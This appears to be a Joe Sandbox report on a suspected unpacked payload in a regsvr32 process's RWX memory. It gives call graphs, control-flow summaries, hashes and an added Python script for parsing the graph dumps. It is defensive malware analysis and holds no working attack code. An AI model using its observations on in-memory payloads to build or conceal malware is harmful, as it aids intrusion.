ExitProcess 7951->7955 7952->7896 7953->7943 7958 2246fd0 7953->7958 8060 22410d0 7953->8060 7954->7953 7957 2246d05 7955->7957 7960 223e560 __CxxCallCatchBlock ExitProcess 7957->7960 7958->7943 7961 2246fe6 7958->7961 7990 22470f2 7958->7990 7959 2246df5 7959->7947 7968 2241494 ExitProcess __GSHandlerCheck_EH 7959->7968 8039 2246610 7959->8039 8053 2247118 7959->8053 7962 2246d0e 7960->7962 7963 2246ff1 7961->7963 7966 2241468 Is_bad_exception_allowed ExitProcess 7961->7966 8017 22414a8 7962->8017 7969 2246490 __GSHandlerCheck_EH ExitProcess 7963->7969 7964 223e560 __CxxCallCatchBlock ExitProcess 7967 22470f8 7964->7967 7966->7963 7970 223e560 __CxxCallCatchBlock ExitProcess 7967->7970 7968->7959 7974 2247008 7969->7974 7972 2247101 7970->7972 7971 223e560 __CxxCallCatchBlock ExitProcess 7976 2246d50 7971->7976 7973 223e300 __GSHandlerCheck_EH ExitProcess 7972->7973 7973->7977 7974->7943 7978 2241160 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7974->7978 7976->7942 7979 223e560 __CxxCallCatchBlock ExitProcess 7976->7979 7977->7939 7977->7952 7978->7943 7980 2246d5c 7979->7980 7982 223e560 __CxxCallCatchBlock ExitProcess 7980->7982 7983 2246d65 7982->7983 8020 2246490 7983->8020 7987 2246d79 8029 2246580 7987->8029 7989 223e300 __GSHandlerCheck_EH ExitProcess 7989->7990 7990->7964 7991 2246d81 __CxxCallCatchBlock std::bad_alloc::bad_alloc __GSHandlerCheck_EH 7991->7989 7993 2245dd8 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7992->7993 7994 224111b 7993->7994 7995 2245dd8 7994->7995 7996 2245de0 7995->7996 7997 223e49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7996->7997 7998 2245e45 7997->7998 7999 2241129 7998->7999 8000 2245de0 __GSHandlerCheck_EH ExitProcess 7998->8000 8001 224106c 7999->8001 8000->7999 8002 22410b7 8001->8002 8004 224108c 8001->8004 8002->7929 8003 223e560 __CxxCallCatchBlock ExitProcess 8003->8004 8004->8002 8004->8003 8006 2245dd8 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8005->8006 8007 2246095 
8006->8007 8008 2241160 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8007->8008 8009 22460aa 8008->8009 8082 2245eb8 8009->8082 8012 22460bc __FrameHandler3::GetHandlerSearchState 8085 2245e7c 8012->8085 8013 22460df 8014 2245eb8 __GetUnwindTryBlock ExitProcess 8013->8014 8015 22460dd 8014->8015 8015->7942 8015->7948 8015->7977 8018 223e560 __CxxCallCatchBlock ExitProcess 8017->8018 8019 22414b6 8018->8019 8019->7971 8019->7977 8021 2246577 8020->8021 8028 22464bb 8020->8028 8023 223e49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8021->8023 8022 2246557 8022->7942 8022->7987 8025 224657c 8023->8025 8024 2241494 ExitProcess __GSHandlerCheck_EH 8024->8028 8026 2241468 Is_bad_exception_allowed ExitProcess 8026->8028 8027 2246610 __GSHandlerCheck_EH ExitProcess 8027->8028 8028->8022 8028->8024 8028->8026 8028->8027 8030 22465ed 8029->8030 8032 224659d Is_bad_exception_allowed 8029->8032 8030->7991 8031 2241468 ExitProcess Is_bad_exception_allowed 8031->8032 8032->8030 8032->8031 8034 2245dd8 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8033->8034 8035 2241372 8034->8035 8036 223e49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8035->8036 8038 2241380 8035->8038 8037 2241464 8036->8037 8038->7959 8040 22466cc 8039->8040 8041 224663d 8039->8041 8040->7959 8042 2241468 Is_bad_exception_allowed ExitProcess 8041->8042 8043 2246646 8042->8043 8043->8040 8044 2241468 Is_bad_exception_allowed ExitProcess 8043->8044 8045 224665f 8043->8045 8044->8045 8045->8040 8046 224668b 8045->8046 8047 2241468 Is_bad_exception_allowed ExitProcess 8045->8047 8048 2241494 __GSHandlerCheck_EH ExitProcess 8046->8048 8047->8046 8049 224669f 8048->8049 8049->8040 8050 22466b8 8049->8050 8051 2241468 Is_bad_exception_allowed ExitProcess 8049->8051 8052 2241494 __GSHandlerCheck_EH ExitProcess 8050->8052 8051->8050 8052->8040 8054 2241160 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8053->8054 8055 2247155 8054->8055 8056 224717b 8055->8056 8088 2246950 
8055->8088 8058 2241468 Is_bad_exception_allowed ExitProcess 8056->8058 8059 224718d __GSHandlerCheck_EH 8058->8059 8059->7959 8061 2245dd8 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8060->8061 8062 22410e4 8061->8062 8063 224106c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8062->8063 8064 22410ee 8063->8064 8064->7958 8066 2247225 8065->8066 8067 2247438 8065->8067 8068 223e560 __CxxCallCatchBlock ExitProcess 8066->8068 8067->7943 8069 224722a 8068->8069 8070 224729c 8069->8070 8076 223e560 __CxxCallCatchBlock ExitProcess 8069->8076 8070->8067 8071 2247453 8070->8071 8072 22472bc 8070->8072 8074 223e49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8071->8074 8073 2241334 __GSHandlerCheck_EH ExitProcess 8072->8073 8081 22472de 8073->8081 8075 2247458 8074->8075 8077 2247259 8076->8077 8077->8070 8120 22415d8 8077->8120 8079 2241468 ExitProcess Is_bad_exception_allowed 8079->8081 8080 2247118 __GSHandlerCheck_EH ExitProcess 8080->8081 8081->8067 8081->8079 8081->8080 8083 2241160 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8082->8083 8084 2245ecb 8083->8084 8084->8012 8084->8013 8086 2241160 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8085->8086 8087 2245e96 8086->8087 8087->8015 8089 2246972 8088->8089 8097 2246750 8089->8097 8091 2246983 8092 22469c4 __AdjustPointer 8091->8092 8093 2246988 __AdjustPointer 8091->8093 8094 2241494 __GSHandlerCheck_EH ExitProcess 8092->8094 8096 22469a7 __GSHandlerCheck_EH 8092->8096 8095 2241494 __GSHandlerCheck_EH ExitProcess 8093->8095 8093->8096 8094->8096 8095->8096 8096->8056 8098 224677d 8097->8098 8100 2246786 8097->8100 8099 2241468 Is_bad_exception_allowed ExitProcess 8098->8099 8099->8100 8101 2241468 Is_bad_exception_allowed ExitProcess 8100->8101 8102 22467a5 8100->8102 8110 2246808 __AdjustPointer __GSHandlerCheck_EH 8100->8110 8101->8102 8103 22467f0 8102->8103 8104 2246810 8102->8104 8102->8110 8106 223e49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8103->8106 
8103->8110 8105 2241494 __GSHandlerCheck_EH ExitProcess 8104->8105 8107 224688f 8104->8107 8104->8110 8105->8107 8108 2246947 8106->8108 8107->8110 8111 2241494 __GSHandlerCheck_EH ExitProcess 8107->8111 8109 223e49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8108->8109 8112 224694d 8109->8112 8110->8091 8111->8110 8113 2246750 __GSHandlerCheck_EH ExitProcess 8112->8113 8114 2246983 8113->8114 8115 22469c4 __AdjustPointer 8114->8115 8116 2246988 __AdjustPointer 8114->8116 8117 2241494 __GSHandlerCheck_EH ExitProcess 8115->8117 8119 22469a7 __GSHandlerCheck_EH 8115->8119 8118 2241494 __GSHandlerCheck_EH ExitProcess 8116->8118 8116->8119 8117->8119 8118->8119 8119->8091 8121 223e560 __CxxCallCatchBlock ExitProcess 8120->8121 8122 2241604 8121->8122 8122->8070 8399 2246310 8402 2248840 8399->8402 8401 2246339 8403 2248861 8402->8403 8404 2248896 __std_exception_copy 8402->8404 8403->8404 8405 223e688 __std_exception_copy ExitProcess 8403->8405 8404->8401 8405->8404 7560 223c1d4 7579 223c4a8 7560->7579 7563 223c233 7567 223c1e8 __FrameHandler3::FrameUnwindToEmptyState __scrt_get_show_window_mode __scrt_acquire_startup_lock __scrt_release_startup_lock 7567->7560 7567->7563 7569 223c2e5 7567->7569 7573 2209a30 7567->7573 7583 223d198 7567->7583 7588 223dd48 7567->7588 7602 223d160 7567->7602 7607 223d16c 7567->7607 7570 223c2ef 7569->7570 7593 223d178 7569->7593 7598 223c4e4 7570->7598 7574 2209a49 CreateThread 7573->7574 7577 2209a87 __scrt_get_show_window_mode 7574->7577 7612 220bdb0 7574->7612 7576 2209e10 GetLocaleInfoA 7576->7577 7577->7576 7578 220a200 __std_exception_copy __scrt_get_show_window_mode 7577->7578 7578->7567 7580 223c4b0 7579->7580 7581 223c4bc __scrt_dllmain_crt_thread_attach 7580->7581 7582 223c4c5 7581->7582 7582->7567 7584 223d1d0 7583->7584 7585 223d1af 7583->7585 7616 223e300 7584->7616 7585->7567 7664 223f678 7588->7664 7590 223dd9d 7590->7567 7591 223dd57 7591->7590 7670 22430cc 7591->7670 7597 223d2a8 
__FrameHandler3::FrameUnwindToEmptyState 7593->7597 7594 223d35a 7594->7570 7596 223d36c 7597->7594 7765 223d274 7597->7765 7599 223c4f5 7598->7599 7601 223c4fe 7599->7601 7769 223d094 7599->7769 7601->7563 7603 223d2a8 __FrameHandler3::FrameUnwindToEmptyState 7602->7603 7604 223d35a 7603->7604 7605 223d274 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7603->7605 7604->7567 7606 223d36c 7605->7606 7611 223d2a8 __FrameHandler3::FrameUnwindToEmptyState 7607->7611 7608 223d35a 7608->7567 7609 223d274 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7610 223d36c 7609->7610 7611->7608 7611->7609 7613 220c56d 7612->7613 7614 220c833 MessageBoxA 7613->7614 7615 220ce27 7613->7615 7614->7613 7614->7615 7621 223ed44 7616->7621 7622 223ed59 _set_fmode __free_lconv_mon 7621->7622 7623 223e309 7622->7623 7624 223e49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7622->7624 7626 223e49c 7623->7626 7625 223ee16 7624->7625 7627 223e4a5 __FrameHandler3::FrameUnwindToEmptyState 7626->7627 7628 223e4b4 __FrameHandler3::FrameUnwindToEmptyState 7627->7628 7632 2240868 7627->7632 7630 223d16c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7628->7630 7631 223e4f1 7630->7631 7634 2240898 _set_fmode 7632->7634 7635 22408bf Concurrency::details::SchedulerProxy::DeleteThis 7632->7635 7633 22408fc 7633->7628 7634->7633 7634->7635 7637 2240941 _set_fmode 7634->7637 7636 2240ac8 Concurrency::details::SchedulerProxy::DeleteThis 7635->7636 7639 22409c2 7635->7639 7641 22409fb Concurrency::details::SchedulerProxy::DeleteThis 7635->7641 7638 223d16c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7636->7638 7650 2240344 7637->7650 7640 2240adf 7638->7640 7639->7641 7643 223ed44 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7639->7643 7644 223ed44 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7641->7644 7647 2240a70 7641->7647 7649 2240a5f 7641->7649 7645 22409eb 7643->7645 7644->7647 7646 223ed44 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 
7645->7646 7646->7641 7648 223ed44 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7647->7648 7647->7649 7648->7649 7649->7628 7653 22406fc 7650->7653 7654 2240727 _invalid_parameter_noinfo 7653->7654 7655 2240771 7654->7655 7659 22405dc 7654->7659 7656 224035d 7655->7656 7658 22405dc _invalid_parameter_noinfo ExitProcess 7655->7658 7656->7633 7658->7656 7660 224062f 7659->7660 7661 22405ef _invalid_parameter_noinfo 7659->7661 7660->7655 7661->7660 7662 223e49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7661->7662 7663 2240642 7662->7663 7665 223f685 7664->7665 7669 223f6ca 7664->7669 7674 223ee18 7665->7674 7667 223f6b4 7679 223fc04 7667->7679 7669->7591 7671 22430e0 7670->7671 7672 223f6d8 ExitProcess 7671->7672 7673 2243104 7672->7673 7673->7591 7677 223ee29 _set_fmode __free_lconv_mon 7674->7677 7675 223e49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7676 223eeb9 7675->7676 7677->7675 7678 223ee3c _set_fmode __free_lconv_mon 7677->7678 7678->7667 7688 223fb4c 7679->7688 7681 223fc39 7701 223fa34 7681->7701 7683 223fc40 7686 223fc56 _set_fmode __free_lconv_mon 7683->7686 7704 223f774 7683->7704 7685 223fd71 __free_lconv_mon 7685->7686 7709 224005c 7685->7709 7686->7669 7691 223fb6f Concurrency::details::SchedulerProxy::DeleteThis __free_lconv_mon 7688->7691 7689 223fbeb 7689->7681 7690 223e49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7692 223fc03 7690->7692 7691->7689 7691->7690 7693 223fb4c ExitProcess 7692->7693 7694 223fc39 7693->7694 7695 223fa34 ExitProcess 7694->7695 7696 223fc40 7695->7696 7697 223f774 ExitProcess 7696->7697 7699 223fc56 _set_fmode __free_lconv_mon 7696->7699 7698 223fd71 __free_lconv_mon 7697->7698 7698->7699 7700 224005c ExitProcess 7698->7700 7699->7681 7700->7699 7715 223f6d8 7701->7715 7705 223fa34 ExitProcess 7704->7705 7708 223f7a1 __scrt_get_show_window_mode 7705->7708 7706 223f8f7 _log10_special 7706->7685 7708->7706 7751 223fe74 7708->7751 7710 2240078 _set_fmode 
Concurrency::details::SchedulerProxy::DeleteThis __scrt_get_show_window_mode 7709->7710 7711 2240344 _invalid_parameter_noinfo ExitProcess 7710->7711 7712 22400a5 _set_fmode __scrt_get_show_window_mode 7710->7712 7711->7712 7713 2240344 _invalid_parameter_noinfo ExitProcess 7712->7713 7714 2240157 Concurrency::details::SchedulerProxy::DeleteThis __free_lconv_mon 7712->7714 7713->7714 7714->7686 7716 223f6f7 7715->7716 7717 223f6fc 7715->7717 7716->7683 7717->7716 7718 223ed44 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7717->7718 7719 223f717 7718->7719 7723 2244e18 7719->7723 7724 2244e2d 7723->7724 7726 223f73a 7723->7726 7724->7726 7731 22422c8 7724->7731 7727 2244e4c 7726->7727 7728 2244e74 7727->7728 7729 2244e61 7727->7729 7728->7716 7729->7728 7737 223f65c 7729->7737 7732 223ed44 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7731->7732 7734 22422d7 Concurrency::details::SchedulerProxy::DeleteThis 7732->7734 7733 2242322 7733->7726 7734->7733 7735 223e49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7734->7735 7736 2242335 7735->7736 7738 223ed44 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7737->7738 7742 223f665 Concurrency::details::SchedulerProxy::DeleteThis __free_lconv_mon 7738->7742 7739 223fbeb 7739->7728 7740 223e49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7741 223fc03 7740->7741 7743 223fb4c ExitProcess 7741->7743 7742->7739 7742->7740 7744 223fc39 7743->7744 7745 223fa34 ExitProcess 7744->7745 7746 223fc40 7745->7746 7747 223f774 ExitProcess 7746->7747 7749 223fc56 _set_fmode __free_lconv_mon 7746->7749 7748 223fd71 __free_lconv_mon 7747->7748 7748->7749 7750 224005c ExitProcess 7748->7750 7749->7728 7750->7749 7752 223feb1 7751->7752 7758 223ffa7 _log10_special 7751->7758 7752->7758 7759 2241d74 7752->7759 7754 223ff3b 7762 2244a4c 7754->7762 7756 223ff6e 7757 2244a4c ExitProcess 7756->7757 7757->7758 7758->7706 7760 223f6d8 ExitProcess 7759->7760 7761 2241db6 _log10_special __free_lconv_mon 
__scrt_get_show_window_mode 7760->7761 7761->7754 7763 223f6d8 ExitProcess 7762->7763 7764 2244a71 7763->7764 7764->7756 7766 223d281 __FrameHandler3::FrameUnwindToEmptyState 7765->7766 7767 223d29d ExitProcess 7766->7767 7768 223d2a8 __FrameHandler3::FrameUnwindToEmptyState 7767->7768 7768->7596 7770 223d09c 7769->7770 7773 223d0b2 7769->7773 7771 223d0ab 7770->7771 7774 2240b2c 7770->7774 7771->7601 7773->7601 7775 2240c94 7774->7775 7777 2240d90 7775->7777 7778 2240daf Concurrency::details::SchedulerProxy::DeleteThis 7777->7778 7779 2240e59 Concurrency::details::SchedulerProxy::DeleteThis 7778->7779 7781 2240cf4 7778->7781 7783 2240d11 7781->7783 7782 2240d41 7782->7778 7783->7782 7785 2240b34 7783->7785 7786 2240b67 7785->7786 7787 2240b87 7786->7787 7788 2240b7c 7786->7788 7802 2240c08 7787->7802 7800 2240c94 7788->7800 7791 2240b90 7792 2240b83 7791->7792 7806 2245028 7791->7806 7793 2240bdc 7792->7793 7795 22405dc _invalid_parameter_noinfo ExitProcess 7792->7795 7796 2240bf1 7793->7796 7798 22405dc _invalid_parameter_noinfo ExitProcess 7793->7798 7795->7793 7796->7782 7798->7796 7801 2240d90 ExitProcess 7800->7801 7803 2240c2e 7802->7803 7805 2240c4f 7802->7805 7804 2245028 ExitProcess 7803->7804 7803->7805 7804->7805 7805->7791 7807 2240bac 7806->7807 7808 2245031 _set_fmode 7806->7808 7810 2244f08 7807->7810 7809 2240344 _invalid_parameter_noinfo ExitProcess 7808->7809 7809->7807 7811 2244f25 7810->7811 7813 2244f18 _set_fmode 7810->7813 7812 2244f81 _set_fmode 7811->7812 7814 2244f54 7811->7814 7815 2240344 _invalid_parameter_noinfo ExitProcess 7812->7815 7813->7792 7817 2244f9c 7814->7817 7815->7813 7818 2244fb8 7817->7818 7820 2244fe7 _set_fmode 7818->7820 7821 22433dc 7818->7821 7820->7813 7822 22433fa _set_fmode 7821->7822 7823 22433e5 _set_fmode 7821->7823 7822->7823 7824 2240344 _invalid_parameter_noinfo ExitProcess 7822->7824 7823->7820 7824->7823 8552 223cdd8 8553 223e300 __GSHandlerCheck_EH ExitProcess 8552->8553 8554 223cde1 8553->8554 8192 
2240a98 8194 2240aa6 8192->8194 8193 2240a5f 8194->8193 8195 223ed44 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8194->8195 8195->8193 8534 2243798 8536 22437ad 8534->8536 8535 22437c0 8536->8535 8537 223e560 __CxxCallCatchBlock ExitProcess 8536->8537 8538 22437d0 8537->8538 8539 223e560 __CxxCallCatchBlock ExitProcess 8538->8539 8540 22437d9 8539->8540 8541 223e300 __GSHandlerCheck_EH ExitProcess 8540->8541 8542 22437e2 8541->8542

                  Control-flow Graph

                  Memory Dump Source
                  • Source File: 0000000B.00000002.2209329233.0000000002201000.00000040.00001000.00020000.00000000.sdmp, Offset: 02201000, based on PE: false (dump of process 11, regsvr32; the 00000040/00001000/00020000 fields match the Windows constants PAGE_EXECUTE_READWRITE, MEM_COMMIT and MEM_PRIVATE, so this is a privately allocated RWX region with no image backing, consistent with an unpacked in-memory payload rather than a module loaded from disk)
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2201000_regsvr32.jbxd
                  • API ID: CreateInfoLocaleThread
                  • String ID: 5
                  • API String ID: 899703944-2226203566
                  • Opcode ID: ac61b2cba66e79233cc380a49c31ec76b5bea808db43e292b3db5bd03ea4f0b3
                  • Instruction ID: 15b43e84139520742684572fc7cbcfb6fc13bbb6129de3d58c8df81ebeaf2d65
                  • Opcode Fuzzy Hash: ac61b2cba66e79233cc380a49c31ec76b5bea808db43e292b3db5bd03ea4f0b3
                  • Instruction Fuzzy Hash: 4313D56BBA55140BBB0C88B699A33E773C7D3D6719F29B13D89C3C3587DCAA480B0585

                  Control-flow Graph

                  Control-flow graph for 220bdb0 (node/edge list omitted; executed/not-executed colouring not reproduced): 9 basic blocks. The entry 220bdb0-220c567 and 220c578-220c78e are long straight-line blocks; the only API call site is MessageBoxA in 220c833-220cdfe, reached from 220c790-220c827 and 220c829-220c82d; the function exits through 220ce27-220ce37.
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2209329233.0000000002201000.00000040.00001000.00020000.00000000.sdmp, Offset: 02201000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2201000_regsvr32.jbxd
                  • API ID: Message
                  • String ID:
                  • API String ID: 2030045667-0
                  • Opcode ID: 60d6a659b960b3717680036fba42c66b31b789c7868b512b370437a3548f9c93
                  • Instruction ID: 9ab14b140fcc22c342accee5e86b6d7d010e6a70cf04748c5b8a827f8dfba4db
                  • Opcode Fuzzy Hash: 60d6a659b960b3717680036fba42c66b31b789c7868b512b370437a3548f9c93
                  • Instruction Fuzzy Hash: 2B92C46BBF55000BAB0C88B699A73F323C7D396719F29B53D45D7C3152ECAE884B0585

                  Control-flow Graph

                  Control-flow graph for 223d274 (node/edge list omitted; executed/not-executed colouring not reproduced): 14 basic blocks. The entry 223d274-223d283 calls 223d250; block 223d296-223d2cb calls 223d1e0 and ExitProcess (ref 0223D29F, listed below); a chain of short compare-and-branch blocks 223d2cd..223d312 (the last of which calls 223d1e0 again) converges on 223d317-223d358, which calls 223d43c and then either returns through 223d35a-223d364 or calls 223d274 again from 223d365-223d367.
                  APIs
                  • ExitProcess.KERNEL32(?,?,?,?,?,?,00000004,0223D36C), ref: 0223D29F
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2209329233.0000000002201000.00000040.00001000.00020000.00000000.sdmp, Offset: 02201000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2201000_regsvr32.jbxd
                  • API ID: ExitProcess
                  • String ID:
                  • API String ID: 621844428-0
                  • Opcode ID: 83775a422325cb061dd29d8490b154c16ce4811a866643c6ee45823764a3e1be
                  • Instruction ID: c34356d85fe502a1b5956ccf68c26b417c2159f45d41f58e7fa31ad8e28ed4ad
                  • Opcode Fuzzy Hash: 83775a422325cb061dd29d8490b154c16ce4811a866643c6ee45823764a3e1be
                  • Instruction Fuzzy Hash: C1316BB0910B0E8BDF15EFA488886ED77B1FB58308F04453AD40AD7295EB75C985CB81
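                  The control_flow_graph data in these records (and the call graph, which uses the same node/edge grammar) can be triaged without a graph viewer. The script below is an added example written for this page, not part of Joe Sandbox or its report; the width limits it uses to tell node ids from addresses (up to five decimal digits versus six to eight hex digits) are a heuristic inferred from the dumps shown here, and the API-name filter (CamelCase identifier, no underscore or "::") is likewise an assumption. The sample inputs are the graph data the report shows for the 220bdb0 (MessageBoxA) and 223d274 (ExitProcess) functions and an abridged fragment of the call graph, embedded inline so the script runs offline.

```python
"""Triage helper for Joe Sandbox "control_flow_graph" / call-graph text dumps.

Grammar as seen in the report: a node is a decimal id followed by an address or
address range ("85 220bdb0-220c567"); tokens after that, up to the next node or
edge, are labels ("call 223d1e0", "ExitProcess", "* 2"); an edge is "a->b".
"""
import re
from collections import defaultdict, deque

NODE_ID = re.compile(r"^\d{1,5}$")                      # heuristic: short decimal ids
ADDR = re.compile(r"^[0-9a-f]{6,8}(?:-[0-9a-f]{6,8})?$")  # heuristic: 6-8 hex digits
EDGE = re.compile(r"^(\d+)->(\d+)$")
API_NAME = re.compile(r"^[A-Z][A-Za-z0-9]*$")             # CamelCase import, no '_'/'::'
NOISE = {"call", "calls", "API", "*"}                     # annotation words, not labels


def parse_graph(text):
    """Return (nodes, succs): nodes maps id -> {'addr', 'labels'} in listing order
    (the first node is the function entry); succs maps id -> set of successor ids."""
    tokens = text.split()
    nodes, succs, current, i = {}, defaultdict(set), None, 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE.match(tok)
        if edge:
            succs[int(edge.group(1))].add(int(edge.group(2)))
        elif NODE_ID.match(tok) and i + 1 < len(tokens) and ADDR.match(tokens[i + 1]):
            current = int(tok)
            nodes[current] = {"addr": tokens[i + 1], "labels": []}
            i += 1                              # the address token is consumed as well
        elif current is not None:
            nodes[current]["labels"].append(tok)
        i += 1
    return nodes, succs


def api_labels(labels):
    """Keep labels that look like Win32 import names; drop 'call <addr>' operands,
    '* N' repeat markers and CRT internals (leading '_' or 'x::y')."""
    return [l for l in labels
            if l not in NOISE and not l.isdigit() and not ADDR.match(l) and API_NAME.match(l)]


def reachable(succs, entry):
    """Forward breadth-first closure over the edge list."""
    seen, queue = {entry}, deque([entry])
    while queue:
        for nxt in succs.get(queue.popleft(), ()):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return seen


def api_call_sites(text):
    """Block address/range -> API names, for every block carrying an import label."""
    nodes, _ = parse_graph(text)
    return {n["addr"]: api_labels(n["labels"]) for n in nodes.values() if api_labels(n["labels"])}


def call_targets(text):
    """Sorted addresses used as 'call <addr>' operands, i.e. the internal callees."""
    nodes, _ = parse_graph(text)
    out = set()
    for n in nodes.values():
        labs = n["labels"]
        out.update(labs[i + 1] for i, l in enumerate(labs[:-1]) if l == "call" and ADDR.match(labs[i + 1]))
    return sorted(out)


def reachable_apis(text):
    """Sorted import names on blocks reachable from the entry (first node listed)."""
    nodes, succs = parse_graph(text)
    seen = reachable(succs, next(iter(nodes)))
    return sorted({api for nid in seen if nid in nodes for api in api_labels(nodes[nid]["labels"])})


def unreachable_blocks(text):
    """Addresses of blocks never reached from the entry by explicit edges
    (dead code, or blocks entered only through an exception handler)."""
    nodes, succs = parse_graph(text)
    seen = reachable(succs, next(iter(nodes)))
    return [n["addr"] for nid, n in nodes.items() if nid not in seen]


# Constructed sample inputs: graph data as printed in the report for 220bdb0 and 223d274,
# plus an abridged fragment of the call graph (labels shortened, node order kept).
CFG_220BDB0 = (
    "85 220bdb0-220c567 86 220c790-220c827 85->86 87 220c56d-220c572 85->87 "
    "89 220c833-220cdfe MessageBoxA 86->89 90 220c829-220c82d 86->90 87->86 "
    "88 220c578-220c78e 87->88 88->86 92 220ce00-220ce08 89->92 93 220ce27-220ce37 "
    "89->93 90->89 91 220ce0a-220ce22 90->91 91->89 92->91 92->93"
)
CFG_223D274 = (
    "96 223d274-223d283 call 223d250 99 223d296-223d2cb call 223d1e0 ExitProcess 96->99 "
    "100 223d285-223d28e 96->100 105 223d317-223d358 call 223d43c 99->105 "
    "106 223d2cd-223d2d8 99->106 100->99 111 223d365-223d367 call 223d274 105->111 "
    "112 223d35a-223d364 105->112 106->105 110 223d2da-223d2e2 106->110 110->105 "
    "113 223d2e4-223d2f1 110->113 116 223d36c-223d36f 111->116 113->105 "
    "115 223d2f3-223d2fc 113->115 115->105 117 223d2fe-223d305 115->117 117->105 "
    "118 223d307-223d30e 117->118 118->105 119 223d310-223d312 call 223d1e0 118->119 119->105"
)
CALLGRAPH_FRAGMENT = (
    "7573 2209a30 7574 2209a49 CreateThread 7573->7574 "
    "7577 2209a87 __scrt_get_show_window_mode 7574->7577 7612 220bdb0 7574->7612 "
    "7576 2209e10 GetLocaleInfoA 7576->7577 7577->7576 "
    "7578 220a200 __std_exception_copy __scrt_get_show_window_mode 7577->7578 "
    "7613 220c56d 7612->7613 7614 220c833 MessageBoxA 7613->7614 7615 220ce27 7613->7615 "
    "7614->7613 7614->7615 7560 223c1d4 7567 223c1e8 __scrt_acquire_startup_lock 7567->7560 7567->7573"
)

if __name__ == "__main__":
    for name, g in (("220bdb0", CFG_220BDB0), ("223d274", CFG_223D274), ("callgraph", CALLGRAPH_FRAGMENT)):
        print(name, api_call_sites(g), reachable_apis(g), call_targets(g), unreachable_blocks(g))
```

                  On 223d274 the script reports ExitProcess as the only import, 223d1e0/223d250/223d274/223d43c as internal callees, and no unreachable block, so every block lies on a path from the entry. On the call-graph fragment the two start-up nodes that call 2209a30 come out as unreachable, which is expected: the walk is forward from the first listed node, so callers of the entry are never visited.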

                  Control-flow Graph

                  Control-flow graph for 2236f30 (node/edge list omitted; executed/not-executed colouring not reproduced): 26 basic blocks with no call or API labels at all, several of them thousands of bytes of straight-line code (2236f30-2237537, 2237543-2237944, 2237960-2237f20, 2237f4b-2238e1d, 2238e40-223a2b7, 223a3dd-223a8d4), plus a one-instruction block at 223a8f0 whose only edge is to itself.
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2209329233.0000000002201000.00000040.00001000.00020000.00000000.sdmp, Offset: 02201000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2201000_regsvr32.jbxd
                  • API ID:
                  • String ID: vyTn
                  • API String ID: 0-1089316748
                  • Opcode ID: ac73c6055c85f12ac252a6679bea8b96955aaa643fb23d62653498d36e1fd4e8
                  • Instruction ID: 499dcec78f24170e5d0efe6d38fad6ec483613e0c81b24841d7532f76a5a8869
                  • Opcode Fuzzy Hash: ac73c6055c85f12ac252a6679bea8b96955aaa643fb23d62653498d36e1fd4e8
                  • Instruction Fuzzy Hash: FE73925BBB55100BBB0C887A99A33E323C3D3A7729F29B63D85E3C3693D85E480B5545
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2209329233.0000000002201000.00000040.00001000.00020000.00000000.sdmp, Offset: 02201000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2201000_regsvr32.jbxd
                  • API ID: _clrfp
                  • String ID:
                  • API String ID: 3618594692-0
                  • Opcode ID: 0825bef10224c9187826c5c0cc1e92805fa228d677d99d5450349513bd5de2ce
                  • Instruction ID: 9a2c12c5fdbe68a870605ea218139f0d65f18801693b71275128f8782e5a1bb0
                  • Opcode Fuzzy Hash: 0825bef10224c9187826c5c0cc1e92805fa228d677d99d5450349513bd5de2ce
                  • Instruction Fuzzy Hash: 2EB17A30520A5E8FDB9DCF1CC88AB5677E0FF49318F198599E899CB265C735D892CB01
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2209329233.0000000002201000.00000040.00001000.00020000.00000000.sdmp, Offset: 02201000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2201000_regsvr32.jbxd
                  • API ID:
                  • String ID: vyTn
                  • API String ID: 0-1089316748
                  • Opcode ID: fee1ff493de0a62dfbd6c4a6402f45fc275154e1010e7b9f75b7645ba25e9ffc
